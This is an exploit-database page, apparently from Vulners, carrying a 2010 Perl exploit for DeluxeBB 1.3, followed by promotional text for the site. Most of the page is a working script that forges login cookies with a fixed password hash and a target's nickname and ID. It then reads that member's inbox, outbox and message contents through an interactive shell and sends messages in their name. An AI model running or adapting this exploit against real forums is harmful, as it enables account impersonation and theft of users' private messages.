Lucene search
K

DeluxeBB 1.3 - Private Information Disclosure

🗓️ 07 Nov 2010 00:00:00Reported by Vis IntelligendiType 
exploitpack
 exploitpack
👁 17 Views

DeluxeBB 1.3 - Private Information Disclosure. Perl exploit for DeluxeBB version 1.3 allows unauthorized access to private messages, including inbox, outbox, and member details

Code
======================================================================
                 DeluxeBB <= 1.3 Private Info Disclosure
		       Vis Intelligendi
======================================================================
VIS INTELLIGENDI http://vis-intelligendi.co.cc
Un hacker Ë principalmente un filosofo. Conoscenza.
======================================================================

Explanation:
details on http://vis-intelligendi.co.cc (search deluxebb)

======================================================================

Perl Exploit :

#!usr/bin/perl
# DeluxeBB 1.3 <= Info Disclosure ( pm.php )
#           Vis Intelligendi.
use LWP::UserAgent;
use HTTP::Request;
use Switch;

	my ($site,$membercookie,$memberid) = @ARGV;
	my $memberpw = '6e6bc4e49dd477ebc98ef4046c067b5f'; #ciao \\ Inutile
	my $inbox = '/pm?sub=folder&name=inbox';
	my $outbox = '/pm?sub=folder&name=outbox';
	my $general = '/pm.php';
	my $new = '/pm.php?sub=newpm';

 if (@ARGV < 3) { die "\n Usage: perl x.pl site nick id\n\n"; exit; } 

&general;

sub broswer() 
 {
      $bro = LWP::UserAgent->new();
      $bro->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
      $bro->default_header("Cookie" => "membercookie=$membercookie; memberpw=$memberpw; memberid=$memberid");
 }

sub general() 
 {
  &broswer;
  $req = HTTP::Request->new(GET => $site.$general);
  my $res = $bro->request($req);
  $content = $res->content();
  while ($content =~ /<span class="misctext">(\d*)<\/span><\/td>/g)
      {
     push(@pm,$1); 
   }
  &splash_gen;
  &sh;
 }


sub splash() 
 {
 print "--------------------------------------------\n";
 print "       DeluxeBB Info Disclosure <= 1.3      \n";
 print "             Vis Intelligendi               \n";
 print "		http://vis-intelligendi.co.cc		\n";
 print "--------------------------------------------\n";

 }

sub splash_gen() 
 {
 system("clear");
&splash;
  print "-------------------------------------------\n";
  print " Site: $site                               \n";
  print " General Pm of: $membercookie              \n";
  print "-------------------------------------------\n";
  print "  Read                Unread     \n\n";
  print " Inbox :  $pm[1]            $pm[2]          \n";
  print " Outbox:  $pm[3]            $pm[4]          \n";
  print " Saves:   $pm[5]            $pm[6]           \n";
  print " Tracker: $pm[7]            $pm[8]          \n";
 }

sub sh() 
 {
print "\n sh> "; $sh = <stdin>; chomp $sh;
switch($sh) {
  case "help" { &sh::help; }
  case "quit" { system "clear";exit(); }
  case "inbox" { &inbox; }
  case "outbox" { &outbox; }
  case "new" { &newpm; }
  case "read" { &read; }
  }
 }

sub sh::help() {
system("clear");
print q(
-----------------------------
DeluxeBB <= 1.3 Info Shell
-----------------------------

help - Leggi questo faq
quit - Termina exploit
inbox - Leggi inbox
outbox - Leggi outbox 
read - Leggi pm
new - Scrivi pm
);
sleep(3); 
&splash_gen; &sh;
 }

sub inbox() 
 {
&broswer;
$req = HTTP::Request->new(GET => $site.$inbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g) { push(@inbox_l,$1); push(@inbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@inbox_f,$1); }  
&splash;
print "--------------------------------------------------\n";
for my $indice (0..$#inbox_l)
{
$inbox_l[$indice] =~ s/amp;//g;
print " $inbox_l[$indice]  - Title: $inbox_t[$indice]      - From:  $inbox_f[$indice]\n";
}
print "--------------------------------------------------\n";
(@inbox_l,@inbox_t,@inbox_f) = '';
&sh;
 }

sub outbox() 
 {
&broswer;
$req = HTTP::Request->new(GET => $site.$outbox);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /(pm.php\?sub=view&pid=\d*)">(.*)<\/a>/g){  push(@outbox_l,$1);  push(@outbox_t,$2); }
while ($content =~ /misc.php\?sub=profile&name=(.*)">/g) { push(@outbox_f,$1);}   
&splash;
print "--------------------------------------------------\n";
for my $indice (0..$#outbox_l){
$outbox_l[$indice] =~ s/amp;//g;
print " $outbox_l[$indice]  - Title: $outbox_t[$indice]      - To:  $outbox_f[$indice]\n";
}
print "--------------------------------------------------\n";
(@outbox_l,@outbox_t,@outbox_f) = ''; 
&sh;
 }

sub read()
 {
&broswer;
&splash;
print "\nInserire link pm: "; $link = <stdin>; chomp($link);
$req = HTTP::Request->new(GET => $site.$link);
$res = $bro->request($req);
$content = $res->content();
while ($content =~ /<span class="inputarea"><span class="inputarea">(.*)<\/span><\/span>/g) { push(@pm_r,$1); }
print "---------------------------------\n";
print " Reading PM: $site$link         \n";
print " Of : $membercookie              \n";
print "---------------------------------\n";
$pm_r[0] =~ s/<br \/>//g;
print @pm_r;
@pm_r = ''; 
&sh;
 }

sub newpm
 {
system("cls");
&splash;
print "\nTo:"; $to = <stdin>;
print "\nTitle:"; $tit = <stdin>;
print "\nContent:"; $contnet = <stdin>;
chomp($to,$tit,$contnet);
&broswer;
$res = $bro->post($site.$new,["to" => $to, "subject" => $tit, "posticon" => 'bigsmile.gif', "rte1" => $contnet, "submit" => 'Send']);
print "\n Sended pm to $to from $membercookie\n ";
&sh;
 }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation